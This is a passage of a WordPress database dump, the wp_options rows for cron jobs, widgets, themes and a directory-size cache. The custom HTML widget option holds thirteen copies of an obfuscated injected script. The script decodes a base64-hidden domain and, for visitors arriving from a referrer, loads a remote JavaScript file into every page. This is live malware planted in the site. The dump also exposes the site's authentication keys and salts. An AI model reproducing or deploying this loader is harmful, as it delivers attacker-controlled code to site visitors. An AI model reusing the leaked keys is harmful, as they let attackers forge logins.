schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1733262272;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1733360154;a:1:{s:30:\"wp_delete_temp_updater_backups\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','yes'),(105,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(110,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(111,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(112,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(113,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(114,'nonce_key','g=rG>/Z,->+RUy(/~x<crX6,C+goz{4-<SttJaULib*mjjdz kv]qi)D*[gawpK[','no'),(115,'nonce_salt','2s<]D1w.E|VMcVJ8wYOK|`32_ox.6R@*t[<yT2+4XK1iqjaRkhsv27]GOi97Fc=e','no'),(116,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(117,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(118,'widget_custom_html','a:13:{s:12:\"_multiwidget\";i:1;i:112;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n return;\r\n let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:113;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n return;\r\n let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:114;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n return;\r\n let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:115;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n return;\r\n let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:116;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n return;\r\n let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:117;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n return;\r\n let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:118;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n return;\r\n let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:119;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n return;\r\n let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:120;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n return;\r\n let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:121;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n return;\r\n let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:122;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n return;\r\n let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:123;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n return;\r\n let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}}','yes'),(120,'recovery_keys','a:0:{}','yes'),(121,'theme_mods_twentytwentytwo','a:3:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644939108;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";}s:9:\"sidebar-2\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}}}s:18:\"nav_menu_locations\";a:0:{}}','yes'),(124,'https_detection_errors','a:0:{}','yes'),(131,'secure_auth_key','!o/dfyVLvkI*XsqNLWF$UzG=F:`&*US-/j,x!!aLj}<U8@ck]c TK9WJ:srU{18X','no'),(132,'secure_auth_salt','Lt;Dw6QZ-hC7T}zH2km@<]G7]M$Bd=I0rB~$64O9w29yzqeO3V~agtVOXYl1pz','no'),(133,'logged_in_key','SLxWsh2q5xjWp*op3dKUY([Nn/jt3`&v$: f03$~,{:UM$B:EF^T#V&o`i7meory','no'),(134,'logged_in_salt','$`eE!*~qRca|hDLiQX&R9jK>q?fDy{_b+,H,-L3[Em{]%&nuH#g?qFKq`ws>|?)t','no'),(155,'finished_updating_comment_type','1','yes'),(171,'current_theme','Colibri WP','yes'),(172,'theme_mods_activello','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644893771;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}}}}','yes'),(173,'theme_switched','','yes'),(174,'widget_activello-social','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(175,'widget_activello_recent_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(176,'widget_activello-cats','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(199,'widget_recent-comments','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(200,'widget_recent-posts','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(207,'auth_key',' skl)Ij)&nrl8A98Cue;Qso]p}o/8IR5t}YHzL$Ef& FB^[s]9[TBwSLN<pxY<l#','no'),(208,'auth_salt','NqlKRTFS>-[7UluCp ,YT4Ox?)DgAc?0 u>=;,8hmIkx,MYeXkYb]2_(E|y8Lm8T','no'),(217,'theme_mods_markup-blog','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644937388;s:4:\"data\";a:8:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}s:9:\"offcanvas\";a:0:{}s:17:\"full-width-footer\";a:0:{}}}}','yes'),(218,'markup_theme_notice_start_time','1644893849','yes'),(246,'theme_mods_markup','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644937328;s:4:\"data\";a:8:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}s:9:\"offcanvas\";a:0:{}s:17:\"full-width-footer\";a:0:{}}}}','yes'),(257,'theme_mods_bricksy','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644937794;s:4:\"data\";a:1:{s:19:\"wp_inactive_widgets\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}}}}','yes'),(277,'theme_mods_pondit','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644937997;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}}}}','yes'),(283,'theme_mods_online-education','a:16:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:39:\"online_education_sidebar_layout_default\";s:10:\"no-sidebar\";s:39:\"online_education_sidebar_layout_archive\";s:10:\"no-sidebar\";s:36:\"online_education_sidebar_layout_page\";s:10:\"no-sidebar\";s:43:\"online_education_sidebar_layout_single_post\";s:10:\"no-sidebar\";s:38:\"online_education_content_style_default\";s:5:\"boxed\";s:38:\"online_education_content_style_archive\";s:6:\"normal\";s:35:\"online_education_content_style_page\";s:6:\"normal\";s:42:\"online_education_content_style_single_post\";s:6:\"normal\";s:33:\"online_education_site_logo_height\";i:100;s:35:\"online_education_transparent_header\";i:1;s:34:\"online_education_sub_menu_bg_color\";s:13:\"rgb(45,45,45)\";s:31:\"online_education_page_header_bg\";a:6:{s:16:\"background-color\";s:10:\"rgb(2,2,2)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:8:\"top left\";s:15:\"background-size\";s:7:\"contain\";s:21:\"background-attachment\";s:6:\"scroll\";}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644938186;s:4:\"data\";a:6:{s:19:\"wp_inactive_widgets\";a:0:{}s:17:\"ole-right-sidebar\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}s:12:\"ole-footer-1\";a:0:{}s:12:\"ole-footer-2\";a:0:{}s:12:\"ole-footer-3\";a:0:{}s:12:\"ole-footer-4\";a:0:{}}}}','yes'),(293,'theme_mods_shuttle','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644938231;s:4:\"data\";a:10:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}s:9:\"footer-w1\";a:0:{}s:9:\"footer-w2\";a:0:{}s:9:\"footer-w3\";a:0:{}s:9:\"footer-w4\";a:0:{}s:9:\"footer-w5\";a:0:{}s:9:\"footer-w6\";a:0:{}s:13:\"sub-footer-w1\";a:0:{}s:13:\"sub-footer-w2\";a:0:{}}}}','yes'),(299,'theme_mods_shuttle-grid','a:5:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644939070;s:4:\"data\";a:10:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}s:9:\"footer-w1\";a:0:{}s:9:\"footer-w2\";a:0:{}s:9:\"footer-w3\";a:0:{}s:9:\"footer-w4\";a:0:{}s:9:\"footer-w5\";a:0:{}s:9:\"footer-w6\";a:0:{}s:13:\"sub-footer-w1\";a:0:{}s:13:\"sub-footer-w2\";a:0:{}}}s:12:\"header_image\";s:13:\"remove-header\";}','yes'),(300,'shuttle_redux_variables','a:10:{s:26:\"shuttle_header_styleswitch\";s:0:\"\";s:18:\"shuttle_blog_style\";s:0:\"\";s:25:\"shuttle_blog_style1layout\";s:0:\"\";s:25:\"shuttle_blog_style2layout\";s:0:\"\";s:26:\"shuttle_styles_colorswitch\";s:0:\"\";s:26:\"shuttle_styles_colorcustom\";s:0:\"\";s:25:\"shuttle_styles_skinswitch\";s:0:\"\";s:19:\"shuttle_styles_skin\";s:0:\"\";s:22:\"shuttle_general_layout\";s:7:\"option1\";s:24:\"shuttle_general_sidebars\";s:7:\"Sidebar\";}','yes'),(326,'theme_mods_colibri-wp','a:6:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:11:\"header-menu\";i:5;s:12:\"content-menu\";i:0;}s:18:\"custom_css_post_id\";i:-1;s:58:\"header_front_page.hero.style.background.image.0.source.url\";s:73:\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/header-scaled.jpg\";s:12:\"page_content\";a:0:{}s:11:\"custom_logo\";i:7;}','yes'),(329,'colibri-wp-page-info-theme-notice-dismissed','1','yes'),(336,'_transient_health-check-site-status-result','{\"good\":15,\"recommended\":6,\"critical\":2}','yes'),(337,'recently_activated','a:0:{}','yes'),(338,'_transient_dirsize_cache','a:2549:{s:54:\"/home/websites/gsudice.dataconn.net/wp-content/upgrade\";i:0;s:46:\"/home/websites/gsudice.dataconn.net/wp-content\";i:28;s:75:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-navigation-link\";i:865;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-author\";i:5500;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/list\";i:4669;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/image\";i:30336;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/separator\";i:13254;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/tag-cloud\";i:4589;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/spacer\";i:9528;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/audio\";i:11211;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/site-logo\";i:20232;s:68:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-template\";i:12373;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/shortcode\";i:8116;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/missing\";i:509;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/query\";i:4610;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/site-tagline\";i:4180;s:68:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-comments\";i:11301;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/columns\";i:17299;s:71:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/term-description\";i:588;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/query-title\";i:887;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/video\";i:22014;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/calendar\";i:5089;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-title\";i:4276;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/table\";i:30378;s:76:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/query-pagination-next\";i:740;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/text-columns\";i:8935;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/media-text\";i:19797;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/buttons\";i:15767;s:79:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/query-pagination-numbers\";i:4208;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/block\";i:4874;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/button\";i:21793;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/paragraph\";i:10429;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-excerpt\";i:7385;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/social-links\";i:55550;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/preformatted\";i:4198;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/heading\";i:4991;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/more\";i:6691;s:71:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/query-pagination\";i:14099;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/group\";i:11365;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/pullquote\";i:18776;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/nextpage\";i:5966;s:74:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-featured-image\";i:24343;s:80:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/query-pagination-previous\";i:752;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/page-list\";i:13178;s:70:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/latest-comments\";i:7570;s:68:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/template-part\";i:16158;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/categories\";i:7307;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/file\";i:20282;s:58:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/rss\";i:11885;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/search\";i:16747;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-date\";i:792;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/social-link\";i:5104;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/column\";i:687;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/site-title\";i:4469;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/verse\";i:4285;s:68:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/legacy-widget\";i:501;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-content\";i:384;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/html\";i:6648;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/embed\";i:21103;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/latest-posts\";i:16736;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-terms\";i:3929;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/navigation\";i:130884;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/archives\";i:6698;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/code\";i:7774;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/cover\";i:51044;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/freeform\";i:42190;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/loginout\";i:455;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/pattern\";i:269;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/gallery\";i:88353;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/quote\";i:10971;s:70:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/navigation-link\";i:16278;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/widget-group\";i:319;s:73:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/navigation-submenu\";i:8767;s:54:\"/home/websites/gsudice.dataconn.net